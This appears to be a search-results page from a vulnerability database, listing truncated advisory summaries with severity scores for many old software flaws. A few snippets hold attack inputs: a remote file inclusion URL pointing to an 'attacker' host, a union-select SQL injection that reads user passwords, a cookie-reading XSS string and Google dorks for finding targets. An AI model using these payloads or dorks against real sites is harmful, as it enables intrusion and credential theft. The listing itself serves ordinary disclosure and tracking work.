47153 matches found

securityvulns
added 2007/09/19 12:0 a.m., 390 views

TPTI-07-15: Automated Solutions Modbus TCP Slave ActiveX Control Heap Corruption Vulnerability

TPTI-07-15: Automated Solutions Modbus TCP Slave ActiveX Control Heap Corruption Vulnerability http://www.zerodayinitiative.com/advisories/TPTI-07-15.html September 17, 2007 -- CVE ID: CVE-2007-4827 -- Affected Vendor: Automated Solutions -- Affected Products: Modbus RTU/ASCII/TCP Slave ActiveX...

CVSS: 7.5, AI score: 1, EPSS: 0.04734
Exploits: 0
securityvulns
added 2006/09/11 12:0 a.m., 390 views

PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore() Author: Maksymilian Arciemowicz cXIb8O3 Date: - - Written: 05.09.2006 - - Public: 09.09.2006 SecurityAlert Id: 42 CVE: CVE-2006-4625 SecurityRisk: High Affected Software: PHP 5.1.6 / 4.4.4 = x...

CVSS: 3.6, AI score: 5.7, EPSS: 0.00908
Exploits: 2
securityvulns
added 2012/10/29 12:0 a.m., 389 views

Knowledge Base EE v4.62.0 - SQL Injection Vulnerability

Title: Knowledge Base EE v4.62.0 - SQL Injection Vulnerability Date: 2012-09-11 References: http://www.vulnerability-lab.com/getcontent.php?id=702 VL-ID: 702 Common Vulnerability Scoring System: 8.5 Introduction:...

AI score: 0.1
Exploits: 0
securityvulns
added 2011/08/01 12:0 a.m., 389 views

iCube Lab (product_details.php?cat_id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability iCube Lab (product_details.php?cat_id) AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.icubelab.com/ Persian Gulf 4 Ever! Dork : "Powered by iCube Lab"...

AI score: 3.5
Exploits: 0
securityvulns
added 2006/08/11 12:0 a.m., 389 views

Mambo/Joomla Component Remository v3.25 (mosConfig_absolute_path) Remote File Inclusion Vulnerability

.: insecurity research team :. .advisory. o9.o8.2oo6 Affected Application: Remository v3.25 Mambo/Joomla CMS Component : contact :...

AI score: 0.3
Exploits: 0
securityvulns
added 2014/03/03 12:0 a.m., 388 views

Python buffer overflow

socket.recvfrominfo buffer overflow...

CVSS: 7.5, AI score: 3.5, EPSS: 0.28319
Exploits: 7, References: 1, Affected Software: 1
securityvulns
added 2013/12/09 12:0 a.m., 385 views

Opencart Multiple Vulnerabilities

Title: Opencart Multiple Vulnerabilities Vendor: http://www.opencart.com Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure Vulnerable Version: opencart 1.5.6 prior versions also may be affected Exploitation: Remote with browser Impact: High Vendor Supplied Patch: N/A Original Advisory...

Exploits: 0
securityvulns
added 2011/04/11 12:0 a.m., 383 views

XSS Vulnerabilities in 1024cms Admin Control Panel v1.1.0 Beta

1024cms Admin Control Panel v1.1.0 Beta Complete-Modules Package - Cross-Site Scripting Vulnerability...

AI score: 0.3
Exploits: 0
securityvulns
added 2011/08/17 12:0 a.m., 382 views

PCVmedia (free_gallery.php?cat_id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability PCVmedia (free_gallery.php?cat_id) AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.pcvmedia.com/ Persian Gulf 4 Ever! Dork : "Website designed & developed by PCVmedia.com"...

AI score: 3.1
Exploits: 0
securityvulns
added 2002/09/18 12:0 a.m., 382 views

Bug in Opera and Konqueror

sp00fed packet | advisory 2 | Product: multiple vendors' browsers | Vulnerability: buffer overflow | Danger: low |...

AI score: 7.6
Exploits: 0
securityvulns
added 2001/03/13 12:0 a.m., 381 views

Security Advisory FreeBSD-SA-01:29.rwhod

-----BEGIN PGP SIGNED MESSAGE----- FreeBSD-SA-01:29 Security Advisory FreeBSD, Inc. Topic: rwhod allows remote denial of service Category: core Module: rwhod Announced: 2001-03-12 Credits: Mark Huizer [email protected]...

AI score: 7.6
Exploits: 0
securityvulns
added 2000/05/25 12:0 a.m., 381 views

Conserver Overflow

This overflow is trivial to fix and I've already emailed the developer, but I'm curious to know if it would be at all possible to exploit this overflow. In conserver-GNAC-6.15 in the source for the conserver daemon: group.c line 376: ------------------------- int CheckPasswdpCLServing, pwstring...

AI score: 0.4
Exploits: 0
securityvulns
added 2011/06/11 12:0 a.m., 380 views

VMware Tools Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ Advisory Name: VMware Tools Multiple Vulnerabilities Release Date: 2011-06-03 Application: VMware Guest Tools Severity:...

CVSS: 6.9, AI score: 0.4, EPSS: 0.0032
Exploits: 0
securityvulns
added 2014/12/01 12:0 a.m., 379 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS: 10, AI score: 1.6, EPSS: 0.83162
Exploits: 81, References: 38, Affected Software: 28
securityvulns
added 2013/12/09 12:0 a.m., 379 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS: 8.5, AI score: 1.6, EPSS: 0.23322
Exploits: 78, References: 50, Affected Software: 39
securityvulns
added 2012/09/02 12:0 a.m., 378 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS: 5, AI score: 1.6, EPSS: 0.04195
Exploits: 10, References: 13, Affected Software: 9
securityvulns
added 2011/05/30 12:0 a.m., 378 views

2245

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Debian Security Advisory DSA-2245-1 [email protected] http://www.debian.org/security/ Giuseppe Iuculano May 29, 2011 http://www.debian.org/security/faq...

CVSS: 9.3, AI score: 5.4, EPSS: 0.04375
Exploits: 6
securityvulns
added 2015/11/02 12:0 a.m., 377 views

[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability

ADVISORY INFORMATION Title: Oracle E-Business Suite SQL injection Advisory ID: ERPSCAN-15-026 Advisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/ Date published: 20.10.2015 Vendors contacted: Oracle 2. VULNERABILITY INFORMATION Class:...

CVSS: 3.6, EPSS: 0.01804
Exploits: 0
securityvulns
added 2015/08/24 12:0 a.m., 373 views

Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)

Document Title: Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064) References Source: http://www.vulnerability-lab.com/getcontent.php?id=1576 Video: http://youtu.be/Vkswz7vt23M...

CVSS: 9.3, AI score: 0.7, EPSS: 0.94996
Exploits: 39
securityvulns
added 2015/03/08 12:0 a.m., 371 views

[SECURITY] CVE-2015-0254 XXE and RCE via XSL extension in JSTL XML tags

CVE-2015-0254 XXE and RCE via XSL extension in JSTL XML tags Severity: Important Vendor: The Apache Software Foundation Versions Affected: Standard Taglibs 1.2.1 The unsupported 1.0.x and 1.1.x versions may also be affected. Description: When an application uses x:parse or x:transform tags to...

CVSS: 7.5, EPSS: 0.1326
Exploits: 0
securityvulns
added 2007/02/14 12:0 a.m., 371 views

Microsoft Excel DoS

NULL pointer dereference on corrupted XML/XLS files...

CVSS: 4.3, AI score: 2.3, EPSS: 0.11611
Exploits: 1, References: 2, Affected Software: 1
securityvulns
added 2001/01/29 12:0 a.m., 371 views

Remote Command Execution in guestserver.cgi + exploit

Remote Command execution vulnerability in Lars Ellingsen's guestserver.cgi found at http://www.guestserver.com/ Exploit code at bottom. by: fish stiqz [email protected] Overview: From http://www.stud.ntnu.no/larsell/guestbook/: Guestserver is a guestbook system that enables you to have your own...

AI score: 7.7
Exploits: 0
securityvulns
added 2012/02/15 12:0 a.m., 370 views

TELUS Security Labs VR - Oracle Java Web Start Command Argument Injection Remote Code Execution

Oracle Java Web Start Command Argument Injection Remote Code Execution TSL ID: TSL20120214-01 1. Affected Software Oracle Java Development Kit JDK 6 Update 30 and prior Oracle Java Development Kit JDK 7 Update 2 and prior Oracle JavaFX 2.0.2 and prior Oracle Java Runtime Environment JRE 6 Update ...

CVSS: 10, AI score: 9.8, EPSS: 0.59369
Exploits: 17
securityvulns
added 2010/05/11 12:0 a.m., 368 views

pmwiki: persistent cross site scripting (XSS), CVE-2010-1481

pmwiki: persistent cross site scripting XSS, CVE-2010-1481 References https://vulners.com/cve/CVE-2010-1481 http://int21.de/cve/CVE-2010-1481-pmwiki-xss.html Description The table feature of pmwiki is vulnerable to persistent cross site scripting XSS. The value of the width-parameter is not...

CVSS: 3.5, AI score: 5.4, EPSS: 0.00869
Exploits: 3
securityvulns
added 2007/08/10 12:0 a.m., 368 views

Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability

Coppermine Photo Gallery 1.3.1 Remote File Inclusion Vulnerability DoRk:"Powered by Coppermine Photo Gallery" Vuln. code: requireonce"$sourcedir/Load.php";requireonce"$sourcedir/Security.php"; Exploit: www.server.com/path/bridge/yabbse.inc.php?sourcedir=Sh3LL Author:Ma$tEr-0F-De$a$t0r...

AI score: 3
Exploits: 0
securityvulns
added 2008/10/24 12:0 a.m., 367 views

Microsoft Security Bulletin MS08-067 – Critical Vulnerability in Server Service Could Allow Remote Code Execution (958644)

Microsoft Security Bulletin MS08-067 – Critical Vulnerability in Server Service Could Allow Remote Code Execution 958644 Published: October 23, 2008 Version: 1.0 General Information Executive Summary This security update resolves a privately reported vulnerability in the Server service. The...

CVSS: 10, AI score: 1.5, EPSS: 0.98751
Exploits: 12
securityvulns
added 2006/09/08 12:0 a.m., 366 views

BinGoPHP News <= 3.01 [bnrep] Remote File Include Vulnerability

BinGoPHP News <= 3.01 [bnrep] Remote File Include Vulnerability Discovered By Kw3RLn Romanian Security Team : hTTp://RST-CREW.net : Remote : Yes...

AI score: 1.5
Exploits: 0
securityvulns
added 2012/12/10 12:0 a.m., 365 views

Update on CVE assigned for Wordpress Plugin Simple Gmail Login

Application- Wordpress Plugin Simple Gmail Login Exploit - Stack Trace Error URL- http://wordpress.org/extend/plugins/simple-gmail-login/ Author- Aditya Balapure Link - http://adityabalapure.blogspot.in/ CVE Assigned- CVE-2012-6313. Description Once you have installed this plugin you can login to...

CVSS: 5, AI score: 6.2, EPSS: 0.07182
Exploits: 1
securityvulns
added 2012/09/02 12:0 a.m., 365 views

XSS in PrestaShop

Advisory ID: HTB23091 Product: PrestaShop Vendor: PrestaShop, Inc. Vulnerable Versions: 1.4.7, 1.4.8 and probably prior Tested Version: 1.4.7, 1.4.8 Vendor Notification: May 9, 2012 Public Disclosure: August 29, 2012 Vulnerability Type: Cross-Site Scripting CWE-79 CVE Reference: CVE-2012-2517...

AI score: 6.4, EPSS: 0.01888
Exploits: 3
securityvulns
added 2009/08/19 12:0 a.m., 365 views

HP Network Node Manager remote console weak files permissions

Weak permissions for C:\Program Files\HP OpenView allows executable files and system service file spoofing...

CVSS: 7.2, AI score: 3, EPSS: 0.00501
Exploits: 1, References: 1, Affected Software: 1
securityvulns
added 2006/05/23 12:0 a.m., 364 views

UBB.threads >= 6.4.x Remote File Inclusion

Anomaly 1n The System presents UBB.threads >= 6.4.x Remote File Inclusion founded by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit: /addpostnewpoll.php?addpoll=preview&thispath=http://attacker/cmd.gif?&cmd=id contact: irc.gigachat.net A1TS milw0rm.c...

AI score: 0.9
Exploits: 0
securityvulns
added 2004/02/26 12:0 a.m., 364 views

FreeCHAT DoS

No description provided...

AI score: 1.2
Exploits: 0, References: 1, Affected Software: 1
securityvulns
added 2007/11/26 12:0 a.m., 363 views

PHP 5.2.4 mail.force_extra_parameters unsecure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.2.4 mail.force_extra_parameters unsecure Author: Maksymilian Arciemowicz cXIb8O3 SecurityReason Date: - - Written: 06.09.2007 - - Public: 0x.0x.2007 SecurityReason Research SecurityAlert Id: 47 CVE: CVE-2007-3378 SecurityRisk: Medium Affected...

CVSS: 6.8, AI score: 8.3, EPSS: 0.05331
Exploits: 2
securityvulns
added 2007/02/20 12:0 a.m., 363 views

IrfanView DoS

Program hangs on corrupted WMF files open...

CVSS: 4.3, AI score: 2, EPSS: 0.10487
Exploits: 0, References: 1, Affected Software: 1
securityvulns
added 2004/07/05 12:0 a.m., 362 views

Unreal ircd ip cloaking protection bypass

A hash of the IP address, computed with a simple hashing algorithm, is used to hide the real IP...

AI score: 0.6
Exploits: 0, References: 1, Affected Software: 1
securityvulns
added 2013/07/19 12:0 a.m., 361 views

[email protected]

Title: ePhoto Transfer v1.2.1 iOS - Multiple Web Vulnerabilities Date: 2013-07-17 References: http://www.vulnerability-lab.com/getcontent.php?id=1017 VL-ID: 1017 Common Vulnerability Scoring System: 6.6 Introduction:...

AI score: 0.2
Exploits: 0
securityvulns
added 2007/02/26 12:0 a.m., 361 views

Microsoft Windows Explorer DoS

Application explorer.exe crashes on browsing folder with corrupted WMF file (no need to click file itself)...

CVSS: 7.1, AI score: 1.5, EPSS: 0.16388
Exploits: 0, References: 2, Affected Software: 1
securityvulns
added 2000/07/19 12:0 a.m., 360 views

S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4

ID: S21SEC-003-en Title: Vulnerabilities in Stalker's CommuniGate Pro v3.2.4 Date: 03/04/2000 Status: Vendor contacted Scope: Remote command execution as superuser Platforms: Linux, probably others Author: llmora, fjserna Location: http://www.s21sec.com/en/avisos/s21sec-003-en.txt Release: Public...

Exploits: 0
securityvulns
added 2015/01/19 12:0 a.m., 359 views

Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities

Memory corruptions, headers injection, restrictions bypass...

CVSS: 7.5, AI score: 3, EPSS: 0.65657
Exploits: 4, Affected Software: 3
securityvulns
added 2008/01/02 12:0 a.m., 359 views

[Full-disclosure] IBM Domino Web Access Upload Module inotes6w.dll SEH Overwrite Exploit

This one is the same offset as dwa7w and the same class id as inotes6. Basically inotes6 and inotes6w share the same class id, except that inotes6w is unicode. dwa7w is unicode and has a different class id. Code is inline, I would attach it except for the fact that I set off way too many av scanne...

CVSS: 9.3, AI score: 0.4, EPSS: 0.44184
Exploits: 25
securityvulns
added 2005/04/13 12:0 a.m., 359 views

Microsoft Security Bulletin MS05-019 Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service (893066)

Microsoft Security Bulletin MS05-019 Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service 893066 Issued: April 12, 2005 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Windows Impact of Vulnerability: Remote Code Execution Maximum...

CVSS: 7.5, AI score: 0.7, EPSS: 0.80855
Exploits: 13
securityvulns
added 2014/06/14 12:0 a.m., 358 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS: 9.3, AI score: 1.6, EPSS: 0.99998
Exploits: 76, References: 46, Affected Software: 28
securityvulns
added 2010/11/01 12:0 a.m., 357 views

XSS and SQL Injection vulnerabilities in CMS WebManager-Pro

Hello 3APA3A! I am reporting Cross-Site Scripting and SQL Injection vulnerabilities that I found in CMS WebManager-Pro, a Ukrainian commercial CMS. XSS WASC-08: http://site/index.php?word=2220onMouseOver=alertdocument.cookie20 SQL Injection Authentication Bypass WASC-19: On the page...

AI score: 0.1
Exploits: 0
securityvulns
added 2008/12/14 12:0 a.m., 357 views

Meta Cart Free Database Disclosure

Meta Cart Free Database Disclosure AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina Yazdanmehr - Hadi Kiamarsi Download : http://www.metalinks.com/metacart.htm DORK : "Powered by MetaCart" Bug...

AI score: 1.3
Exploits: 0
securityvulns
added 2003/06/09 12:0 a.m., 357 views

zenTrack Remote Command Execution Vulnerabilities

Subject: zenTrack Remote Command Execution Vulnerabilities Author: farking [email protected] Product: zenTrack 2.4.1 latest and below Vendor: http://zendocs.phpzen.net/zentrack / http://sourceforge.net/projects/zentrack/ Status: Vendor contacted 27/05/2003 Location:...

AI score: 1
Exploits: 0
securityvulns
added 2012/10/15 12:0 a.m., 356 views

ESA-2012-025: EMC NetWorker Module for Microsoft Applications (NMM) Multiple Vulnerabilities

ESA-2012-025.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2012-025: EMC NetWorker Module for Microsoft Applications NMM Multiple Vulnerabilities. EMC Identifier: ESA-2012-025 CVE Identifier: CVE-2012-2284,CVE-2012-2290 Severity Rating: See below for individual severity scores EMC...

CVSS: 9.3, AI score: 1.5, EPSS: 0.03626
Exploits: 0
securityvulns
added 2011/08/27 12:0 a.m., 356 views

Alfazeta (list-prodotti.php?idcategoria) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Alfazeta list-prodotti.php?idcategoria AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.alfazeta.net/ Persian Gulf 4 Ever! Dork : inurl:list-prodotti.php?idcategoria=...

AI score: 3.5
Exploits: 0
securityvulns
added 2008/11/24 12:0 a.m., 356 views

Microsoft Internet Explorer saved pages cross-site scripting

Cross-site scripting in context of local machine is possible on saving URL with address like http://site/--scriptalert"XSS"/script...

CVSS: 4.3, AI score: 0.1, EPSS: 0.10733
Exploits: 0, References: 3
securityvulns
added 2007/04/20 12:0 a.m., 356 views

ZDI-07-018: IBM Tivoli Monitoring Express Universal Agent Heap Overflow Vulnerability

ZDI-07-018: IBM Tivoli Monitoring Express Universal Agent Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-018.html April 18, 2007 -- CVE ID: CVE-2007-2137 -- Affected Vendor: IBM -- Affected Products: IBM Tivoli Monitoring Express 6.1 -- Vulnerability Details: This...

CVSS: 10, AI score: 1.5, EPSS: 0.07735
Exploits: 0
securityvulns
added 2007/04/05 12:0 a.m., 356 views

PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln

PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln Bulan: xoron xoron.biz Exploit: index.php?op=viewgamelist&cid=-1//union//select//null,username,userpassword,null,null,null//from//fusionusers/...

AI score: 0.5
Exploits: 0
Total number of security vulnerabilities: 5000